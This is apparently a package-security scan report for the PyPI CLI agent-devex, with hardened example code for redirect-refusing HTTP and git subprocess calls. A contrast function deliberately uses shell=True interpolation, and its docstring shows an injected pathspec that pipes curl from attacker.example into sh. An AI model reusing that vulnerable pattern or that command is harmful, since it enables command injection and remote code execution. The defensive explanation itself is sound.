agent-devex

v0.29.1 suspicious
4.0
Medium Risk

Agent-operated developer-experience CLI — deterministic per-backend markdown briefings for autonomous agents.

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package makes outbound HTTP requests and runs git through subprocess, which is what trips the network and shell checks. On inspection neither match looks like an attack pattern: the network code deliberately refuses to follow redirects and defines a destination-URL check alongside the opener, and every matched subprocess call passes a list-form argv with no shell. There are no signs of obfuscation or credential harvesting. What remains are ordinary supply-chain concerns (a single-package author, no classifiers) and one thing to verify in review: values interpolated into git options, such as `--since={ts}`, must not be attacker-controlled.

  • Network (moderate): the flagged `_NoRedirectHandler` refuses to follow redirects. That is a hardening measure, not an evasion. Following a 30x on a POST would replay the body, and any Authorization header, to whatever host the Location header names. The score reflects that the package makes outbound calls at all; check where `is_discord_url` allows them to go.
  • Shell (high score, but a pattern count rather than an injection finding): all six matches call `subprocess.run`/`Popen` with list-form argv and without `shell=True`, so there is no shell to inject into. The residual risk with list argv is option injection: a value spliced into a flag such as `--since={ts}` is parsed by git as an option if it starts with '-'.

Per-check LLM notes

  • Network: outbound requests go through a custom opener that refuses redirects, and a URL predicate (`is_discord_url`) sits next to it. Legitimate on its face; the thing to verify is the allow-list the predicate enforces, not the redirect behaviour.
  • Shell: the package invokes git via subprocess with list-form argv and no shell; the `# nosec B603` comments assert the arguments are fixed or come from typed callers. No shell injection is visible; review where interpolated values such as `ts` originate.
  • Obfuscation: No obfuscation patterns detected, indicating low risk.
  • Credentials: No credential harvesting patterns detected, indicating low risk.
  • Metadata: The author has only one package and lacks PyPI classifiers, suggesting low effort or a new/inactive account.

🔬 Heuristic Checks

Outbound Network Calls score 4.5

Found 3 network call pattern(s)

  • d) class _NoRedirectHandler(urllib.request.HTTPRedirectHandler): """Refuse to follow redirects.
  • h our refusing one. _OPENER = urllib.request.build_opener(_NoRedirectHandler) def is_discord_url(url: s
  • encode("utf-8") req = urllib.request.Request( url, data=body,
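As an added example (not code from agent-devex), the pattern these three matches belong to, reconstructed so it can be run: a `HTTPRedirectHandler` subclass installed through `build_opener`, an allow-list predicate of the kind `is_discord_url` suggests, and a JSON POST that surfaces a 30x instead of following it. The allow-listed hosts, the function names and the local redirecting server are assumptions made for this example.

```python
"""Added example, not agent-devex code: refusing HTTP redirects in urllib.

Why a webhook client refuses redirects: a POST that follows a 30x would
replay its body, and any Authorization header, to whatever host the
Location header names.  Refusing is the conservative choice, so this
pattern is a hardening measure rather than an evasion.
"""
from __future__ import annotations

import http.server
import json
import threading
import urllib.error
import urllib.parse
import urllib.request

# Assumed allow-list for the example; the real package's list is not on the page.
ALLOWED_WEBHOOK_HOSTS = frozenset({"discord.com", "discordapp.com"})


class NoRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects; urllib raises HTTPError for the 30x instead."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # None tells urllib not to build a follow-up request


NO_REDIRECT_OPENER = urllib.request.build_opener(NoRedirectHandler)


def is_allowed_webhook_url(url: str, allowed_hosts=ALLOWED_WEBHOOK_HOSTS, require_https: bool = True) -> bool:
    """Scheme and host check done before any request is sent.  URLs carrying
    userinfo (https://discord.com@evil.example/) are rejected outright so the
    allow-listed name cannot be smuggled into the username position."""
    parts = urllib.parse.urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.username or parts.password:
        return False
    if require_https and parts.scheme != "https":
        return False
    return (parts.hostname or "").lower() in allowed_hosts


def post_json(url: str, payload: dict, opener=NO_REDIRECT_OPENER, timeout: float = 5.0, **policy) -> tuple[int, bytes]:
    """POST JSON and return (status, body).  With the no-redirect opener a 30x
    comes back as (3xx, b"") instead of a silently followed request."""
    if not is_allowed_webhook_url(url, **policy):
        raise ValueError(f"refusing to post to non-allow-listed URL: {url}")
    req = urllib.request.Request(
        url,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        if 300 <= err.code < 400:
            return err.code, b""
        raise


class _RedirectingHook(http.server.BaseHTTPRequestHandler):
    """Constructed demo server: /hook answers 302 to /elsewhere, which answers 200."""

    def _reply(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))  # drain the POST body
        if self.path == "/hook":
            self.send_response(302)
            self.send_header("Location", "/elsewhere")
            self.end_headers()
        else:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"followed to " + self.path.encode())

    do_POST = do_GET = _reply

    def log_message(self, *args):  # keep the demo quiet
        pass


if __name__ == "__main__":
    srv = http.server.HTTPServer(("127.0.0.1", 0), _RedirectingHook)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    url = f"http://127.0.0.1:{srv.server_port}/hook"
    local = {"allowed_hosts": {"127.0.0.1"}, "require_https": False}
    # Default opener turns the POST into a GET of /elsewhere: (200, b'followed to /elsewhere').
    print("default opener:   ", post_json(url, {"msg": "hi"}, urllib.request.build_opener(), **local))
    # Hardened opener stops at the redirect: (302, b'').
    print("no-redirect opener:", post_json(url, {"msg": "hi"}, **local))
    srv.shutdown()
```

The demo runs against a loopback server so the two openers can be compared offline; in a real client the allow-list is what decides where a request may go, and the redirect refusal guarantees the decision is not undone by the server's Location header.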

Code Obfuscation

No obfuscation patterns detected

Shell / Subprocess Execution score 10.0

Found 6 shell execution pattern(s)

  • trusted input. proc = subprocess.Popen( # nosec B603 argv, cwd=str(cwd),
  • t. """ paths_staged = subprocess.run( ["git", "diff", "--staged", "--name-only"],
  • tlines() paths_unstaged = subprocess.run( ["git", "diff", "--name-only"], capture_out
  • s = last_read["ts"] out = subprocess.run( ["git", "log", f"--since={ts}", "--pretty=%H"],
  • ro exit. """ result = subprocess.run( # nosec B603 - args are constructed from typed callers
  • clearly. """ result = subprocess.run( # nosec B603 - fixed argv, no user input ["git", "
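As an added example (not the project's code), the hardened form of the subprocess calls these six matches belong to, next to the `shell=True` form that actually would be injectable, plus a guard for the one risk list-form argv does not remove: git option injection through an interpolated flag value such as `--since={ts}`. The timestamp format, function names and environment choices are assumptions for this example.

```python
"""Added example, not agent-devex code: the subprocess patterns the shell
check matched, in hardened form.

A fixed argv list passed to subprocess.run without shell=True leaves no
shell to inject into, which is what the `# nosec B603` comments in the
matched snippets assert.  What list-form argv does NOT prevent is option
injection: a value spliced into `--since=<value>`, or appended as a bare
argument, is parsed by git as a flag if it starts with '-'.
"""
from __future__ import annotations

import os
import re
import shlex
import subprocess
from pathlib import Path
from typing import Optional

# Assumed format for the stored timestamp: ISO-8601 date or datetime.
# Anything else is rejected before it reaches git.
_ISO_TS = re.compile(r"^\d{4}-\d{2}-\d{2}(?:T\d{2}:\d{2}:\d{2}(?:\.\d+)?Z?)?$")


def changed_paths_unsafe(repo: str, pathspec: str) -> list[str]:
    """VULNERABLE, shown for contrast only: shell=True plus string
    interpolation means a pathspec such as
    'src; curl http://attacker.example | sh' runs attacker commands."""
    cmd = f"cd {repo} && git diff --name-only -- {pathspec}"
    return subprocess.check_output(cmd, shell=True, text=True).splitlines()


def git_argv_log_since(ts: str) -> list[str]:
    """Build the `git log --since=...` argv the scanner saw, refusing values
    git could read as options (e.g. '--output=/tmp/x')."""
    if not _ISO_TS.match(ts):
        raise ValueError(f"rejecting non-timestamp --since value: {ts!r}")
    return ["git", "log", f"--since={ts}", "--pretty=%H", "--"]


def git_argv_diff(staged: bool = False, pathspec: Optional[str] = None) -> list[str]:
    """`git diff --name-only [--staged] -- [pathspec]`: the '--' separator
    guarantees a caller-supplied pathspec is treated as a path, never a flag."""
    argv = ["git", "diff", "--name-only"]
    if staged:
        argv.append("--staged")
    argv.append("--")
    if pathspec is not None:
        argv.append(pathspec)
    return argv


def run_git(argv: list[str], cwd, timeout: float = 30.0) -> list[str]:
    """Execute a pre-built git argv: no shell, explicit cwd, a timeout so a
    hung credential prompt cannot block an agent, and a minimal environment."""
    if argv[:1] != ["git"]:
        raise ValueError("run_git only executes git")
    env = {
        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
        "HOME": os.environ.get("HOME", "/"),
        "GIT_TERMINAL_PROMPT": "0",  # fail instead of prompting for credentials
        "LC_ALL": "C",
    }
    proc = subprocess.run(  # nosec B603 - argv is a fixed list built above, no shell
        argv, cwd=str(cwd), capture_output=True, text=True, timeout=timeout, env=env, check=False
    )
    if proc.returncode != 0:
        raise RuntimeError(f"{shlex.join(argv)} failed ({proc.returncode}): {proc.stderr.strip()}")
    return proc.stdout.splitlines()


if __name__ == "__main__":
    # Demo against the current directory; only meaningful inside a git checkout.
    try:
        print("unstaged:", run_git(git_argv_diff(), Path(".")))
        print("staged:  ", run_git(git_argv_diff(staged=True), Path(".")))
        print("since:   ", run_git(git_argv_log_since("2024-01-01"), Path(".")))
    except (RuntimeError, FileNotFoundError) as err:
        print("git not usable here:", err)
```

The split between argv builders and the single runner is deliberate: the builders are pure and can be unit-tested for injection cases without git installed, and the runner is the one place where cwd, timeout and environment policy live.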

Credential Harvesting

No credential harvesting patterns detected

Typosquatting

No typosquatting candidates detected

Registered Email Domain

No author email provided

Suspicious Page Links

All external links appear legitimate

Git Repository History

Repository agentculture/devex appears legitimate

Maintainer History score 4.0

2 maintainer concern(s) found

  • Author "Ori Nachum" appears to have only 1 package on PyPI (new or inactive account)
  • Package has no PyPI classifiers (low effort / metadata quality)

Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with agent-devex
Create a mini-application called 'DevBrief' that leverages the 'agent-devex' package to generate detailed, backend-specific documentation for developers. This tool will allow developers to input their backend technology stack (e.g., Django, Flask, Node.js) and receive a comprehensive markdown briefing tailored to that specific tech stack. The briefing should include setup instructions, common pitfalls, best practices, and useful resources.

Steps to implement:
1. Install the 'agent-devex' package.
2. Develop a user-friendly CLI interface where users can select their backend framework from a predefined list.
3. Utilize the 'agent-devex' package to generate a markdown file containing all necessary information for the selected backend.
4. Implement functionality to save the generated markdown file locally or directly open it in a markdown viewer.
5. Add error handling for cases where the specified backend is not supported by 'agent-devex'.
6. Optionally, integrate a feature that allows users to customize certain sections of the briefing (e.g., adding personal notes).

Features:
- User-friendly command-line interface for selecting backend frameworks.
- Generation of detailed markdown briefings based on the selected backend.
- Saving and viewing options for the generated markdown files.
- Error handling for unsupported backends.
- Optional customization options for briefing content.

Utilization of 'agent-devex':
- Use 'agent-devex' to query the appropriate backend-specific information and format it into a markdown document.
- Ensure that the generated briefings are deterministic, meaning they provide consistent information each time the same backend is queried.